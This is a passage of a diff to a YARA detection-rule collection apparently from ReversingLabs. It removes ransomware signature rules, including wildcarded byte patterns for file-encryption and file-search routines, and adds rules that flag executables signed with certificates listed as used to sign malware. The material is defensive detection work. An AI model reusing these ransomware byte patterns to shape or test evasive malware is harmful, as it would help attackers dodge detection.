6A ?? 8B 11 8B C8 FF D2 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 D2 8B 40 ?? 03 C8 - B8 ?? ?? ?? ?? 39 51 ?? 0F 45 C2 EB ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? - 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 6A ?? 50 E8 ?? ?? ?? ?? - 81 C6 ?? ?? ?? ?? 8D 45 ?? 3B F0 74 ?? 83 7D ?? ?? 8B CE FF 75 ?? 0F 43 45 ?? 50 E8 - ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 - } - $encrypt_files_p4 = { - C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 7F ?? ?? 8B 47 ?? 72 ?? 8B 3F 83 F8 ?? 75 - ?? 0F B6 07 3C ?? 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 8B BD ?? ?? ?? ?? 85 C0 75 ?? 8D - 45 ?? 50 83 EC ?? 8D 87 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC - ?? C6 45 ?? ?? 8B CC 56 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? EB ?? 8B BD ?? ?? - ?? ?? 8D 45 ?? 3B F0 74 ?? 83 7D ?? ?? 8B CE FF 75 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? - 8D 45 ?? 3B C6 74 ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 FF 76 ?? 8D 4D ?? 50 E8 ?? ?? ?? - ?? 6A ?? 68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 C7 46 ?? - ?? ?? ?? ?? 8D 55 ?? C6 00 ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? FF 75 ?? 0F 43 55 ?? E8 - ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? - 0B 41 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D - 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8B C8 C6 - 45 ?? ?? 8B 41 ?? 8B 51 ?? 2B C2 83 F8 ?? 72 ?? 83 79 ?? ?? 8D 42 ?? 89 41 ?? 8B C1 - 72 ?? 8B 01 66 C7 04 02 ?? ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF B5 - ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? 0F 10 01 0F 11 85 ?? ?? ?? ?? F3 0F 7E 41 ?? 66 0F D6 85 ?? ?? ?? ?? - C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 8B - } - $encrypt_files_p5 = { - C2 8B 8D ?? ?? ?? ?? 2B C1 83 F8 ?? 72 ?? 8D 41 ?? 83 FA ?? 89 85 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? C7 04 01 ?? ?? ?? ?? C6 44 01 ?? ?? 8D 85 ?? ?? ?? - ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ?? - ?? 6A ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - 0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ?? - ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? 8D 47 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11 - 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? - ?? ?? ?? ?? C6 00 ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 83 - F8 ?? 72 ?? 8D 41 ?? 83 FA ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? - ?? 66 C7 04 08 ?? ?? 8D 85 ?? ?? ?? ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 - 0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? C6 45 - } - $encrypt_files_p6 = { - 8B BD ?? ?? ?? ?? 8B C7 8B 8D ?? ?? ?? ?? 2B C1 8B 56 ?? 3B D0 76 ?? 8B 46 ?? 2B C2 - 3B C1 72 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 51 0F 43 85 ?? ?? ?? ?? 8B CE 50 6A ?? E8 ?? - ?? ?? ?? EB ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85 - ?? ?? ?? ?? C6 00 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? - ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 6A ?? 68 ?? ?? ?? ?? 83 F8 ?? 72 ?? 83 FA ?? - 8D B5 ?? ?? ?? ?? 8D 41 ?? 0F 43 B5 ?? ?? ?? ?? 03 F1 89 85 ?? ?? ?? ?? 56 E8 ?? ?? - ?? ?? 83 C4 ?? C6 46 ?? ?? 8D 85 ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 0F 10 00 0F 11 45 ?? F3 0F 7E 40 ?? 66 - 0F D6 45 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? C6 45 ?? ?? 8B 95 ?? - ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? - 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 - ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? - 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? - ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? - ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 - } - $encrypt_files_p7 = { - FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 - 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? - ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 - ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? - 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? - 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? - 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? - 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B - } - $encrypt_files_p8 = { - 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? - ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 - ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? 66 89 85 ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? - ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 - ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? - 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 - ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 EC ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? C7 85 ?? ?? ?? ?? - ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 - C6 45 ?? ?? 83 7E ?? ?? 72 ?? 8B 36 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 56 50 E8 ?? ?? - ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? - ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? - ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? - ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 - } - $encrypt_files_p9 = { - 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? - 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 - F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D - ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 - ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 - ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? - 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? - ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 - ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? - 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? - 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 - ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 - 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? - 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? - ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="0c:50:1b:8b:11:32:09:c9:6c:81:19:cf:7a:6b:8b:79" and 1474329600<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0300Ee4A4C52443147821A8186D04309 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "abccf84f-ba18-5644-897c-d23a228facff" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13512-L13528" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8476ece98427c1ffd99d820c25fe664397de2c393473f7d5ee0846d8d840fd9e" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Buster Ind Com Imp e Exp de Acessorios P Autos Ltda" and pe.signatures[i].serial=="03:00:ee:4a:4c:52:44:31:47:82:1a:81:86:d0:43:09" and 1494892800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_IFN643 : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_202Cf8 : INFO FILE { meta: - description = "Yara rule that detects IFN643 ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a4d211a7-6735-541e-885d-555bbc11e2cf" - date = "2020-07-15" - modified = "2020-07-15" + id = "1c442ed6-a48a-52f4-b345-300428ec9c76" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.IFN643.yara#L1-L90" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ced234018f1f05601dd3be55eaecd2a1e116ad0b7bb9e0292434f11f19916ebe" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13530-L13546" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "671a4b522761fdff75d1c0c608e8cfb21c7ab538c8c30c8620315bc58ed358e6" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "IFN643" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $search_files_1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B D6 C7 45 ?? ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 - ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? - 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 8D 8D ?? - ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB - ?? 0F 84 - } - $search_files_2 = { - 80 BD ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 75 ?? 33 - C0 EB ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 8D 85 ?? ?? ?? ?? - 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? - ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 - ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D6 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 0D ?? ?? ?? ?? F7 - E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 83 F8 ?? 0F 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 85 C0 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D6 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8D 4D ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8B 85 ?? - ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? - ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? - 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? - 8B 35 ?? ?? ?? ?? 33 DB 2B CE C7 85 ?? ?? ?? ?? ?? ?? ?? ?? F7 E9 C7 85 ?? ?? ?? ?? - ?? ?? ?? ?? C1 FA ?? 8B C2 C6 85 ?? ?? ?? ?? ?? C1 E8 ?? 03 C2 74 ?? 33 FF ?? ?? ?? - 8D 45 ?? 8D 0C 37 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 83 7D ?? ?? 89 45 ?? 8D 45 ?? 0F 43 - 45 ?? C6 00 ?? 8B 35 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B CE 43 F7 E9 83 - C7 ?? C1 FA ?? 8B C2 C1 E8 ?? 03 C2 3B D8 72 ?? 83 7D ?? ?? 76 ?? 8D 45 ?? B9 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 0D ?? ?? ?? ?? F7 E9 C1 - FA ?? 8B C2 C1 E8 ?? 03 C2 83 F8 ?? 0F 83 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? - 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F - 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 - E8 ?? ?? ?? ?? 83 C4 ?? 8B 9D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? - ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 - F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? - 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B - 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? - 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 - ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 - ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 - ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? - 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 - ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 - ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E - 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $encrypt_files = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ?? - 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B C2 89 45 ?? 8B F9 8B 75 ?? 89 75 ?? - C7 45 ?? ?? ?? ?? ?? 90 3B F8 0F 84 ?? ?? ?? ?? 89 75 ?? C6 45 ?? ?? 85 F6 74 ?? 8B - 17 C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 46 - ?? ?? ?? ?? ?? 72 ?? 8B 06 EB ?? 8B C6 C6 00 ?? 80 3A ?? 75 ?? 33 C0 EB ?? 8B C2 8D - 58 ?? 66 90 8A 08 40 84 C9 75 ?? 2B C3 50 52 8B CE E8 ?? ?? ?? ?? 8B 45 ?? 83 C6 ?? - C6 45 ?? ?? 89 75 ?? 83 C7 ?? EB ?? 8B 55 ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A - ?? 6A ?? E8 ?? ?? ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3 - 2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9 - ?? ?? ?? ?? 33 C0 57 8B F9 40 F0 0F C1 05 ?? ?? ?? ?? 75 ?? 56 BE ?? ?? ?? ?? 56 E8 - ?? ?? ?? ?? 83 C6 ?? 59 81 FE ?? ?? ?? ?? 7C ?? 5E 8B C7 5F C3 - } - condition: - uint16(0)==0x5A4D and $search_files_1 and $search_files_2 and $encrypt_files + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DATALINE LTD." and pe.signatures[i].serial=="20:2c:f8" and 1087841761<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Networm : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6651Cc8B4850D4Dec61961503Ea7956B : INFO FILE { meta: - description = "Yara rule that detects Networm ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3b17b97d-c882-5f65-8b89-847e2300873c" - date = "2021-07-05" - modified = "2021-07-05" + id = "88679114-9c85-5810-af21-d5c2a8dc759e" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Networm.yara#L1-L103" - 